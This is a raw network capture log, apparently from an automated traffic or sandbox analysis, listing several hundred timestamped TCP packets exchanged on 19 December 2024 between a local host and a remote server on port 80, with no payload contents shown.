                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.734265089 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.734294891 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.736814022 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.736870050 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.736929893 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.736979961 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.739401102 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.739459991 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.739540100 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.739583015 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.742002964 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.742052078 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.742127895 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.742172956 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.744586945 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.744648933 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.744692087 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.744740963 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.747072935 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.747126102 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.747145891 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.747188091 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.749412060 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.749461889 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.749512911 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.749562979 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.751835108 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.751888037 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.752012014 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.752049923 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.754244089 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.754293919 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.754353046 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.754403114 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.756674051 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.756746054 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.756843090 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.756896019 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.759155989 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.759191036 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.759208918 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.759241104 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.761600971 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.761665106 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.761706114 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.761756897 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.763956070 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.764003992 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.764019966 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.764065981 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.766355991 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.766407967 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.766443968 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.766489983 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.768726110 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.768774986 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.768892050 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.768939018 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.771145105 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.771193981 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.771348953 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.771398067 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.773718119 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.773766041 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.773828983 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.773871899 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.776022911 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.776070118 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.776108980 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.776153088 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.778554916 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.778572083 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.778600931 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.778624058 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.780921936 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.780935049 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.780965090 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.780982018 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.783226967 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.783272028 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.783354998 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.783396959 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.785676956 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.785721064 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.785801888 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.785844088 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.788064957 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.788105965 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.788177967 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.788218021 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.790452003 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.790493965 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.790576935 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.790612936 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.792979956 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.793023109 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.793081999 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.793126106 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.795352936 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.795402050 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.795469046 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.795511007 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.797843933 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.797857046 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.797884941 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.797897100 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.800199032 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.800244093 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.800317049 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.800354004 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.802602053 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.802642107 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.802800894 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.802839041 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.804994106 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.805032969 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.805115938 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.805157900 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.807408094 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.807449102 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.807473898 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.807512045 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.809844017 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.809890032 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.809942961 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.809978008 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.812335014 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.812377930 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.812488079 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.812525988 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.814661980 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.814702988 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.814765930 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.814806938 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.817147970 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.817243099 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.817244053 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.817291975 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.819561005 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.819581032 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.819601059 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.819623947 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.822022915 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.822072983 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.915513992 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.915577888 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.915611982 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.915647984 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.916445017 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.916484118 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.916511059 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.916548014 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.918354988 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.918406963 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.918495893 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.918540955 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.920305014 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.920351028 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.920480013 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.920519114 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.922302008 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.922363997 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.922494888 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.922535896 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.924324036 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.924335003 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.924362898 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.924385071 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.926084995 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.926141024 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.926235914 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.926275969 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.928034067 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.928045988 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.928076982 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.930075884 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.930087090 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.930121899 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.931850910 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.931863070 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.931906939 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.931919098 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.933429003 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.933526993 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.933531046 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.933582067 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.935144901 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.935189009 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.935271978 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.935316086 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.936917067 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.936956882 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.937026978 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.937067032 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.938740015 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.938781977 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.938788891 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.938827991 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.940395117 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.940434933 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.940601110 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.940639019 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.942172050 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.942183018 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.942217112 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.943794966 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.943856001 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.943903923 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.943943024 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.945472956 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.945513010 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.945543051 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.945580959 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.947177887 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.947217941 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.947247028 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.947287083 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.948811054 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.948860884 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.948921919 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.948962927 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.950536013 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.950576067 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.950634003 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.950674057 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.952137947 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.952179909 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.952248096 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.952290058 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.953829050 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.953888893 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.953964949 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.954005003 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.955674887 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.955686092 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.955715895 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.955733061 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.957350016 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.957391977 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.957401037 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.957429886 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.958916903 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.958960056 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.958962917 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.959002972 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.960658073 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.960669994 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.960697889 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.960717916 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.962232113 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.962275028 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.962459087 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.962497950 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.963969946 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.964027882 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.964174986 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.964212894 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.965632915 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.965672970 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.965720892 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.965765953 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.967252016 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.967292070 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.967401981 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.967439890 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.968905926 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.968946934 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.969214916 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.969254017 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.970581055 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.970622063 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.970679045 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.970721006 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.972270012 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.972309113 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.972373962 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:41.972414017 CET4983880192.168.2.431.41.244.11
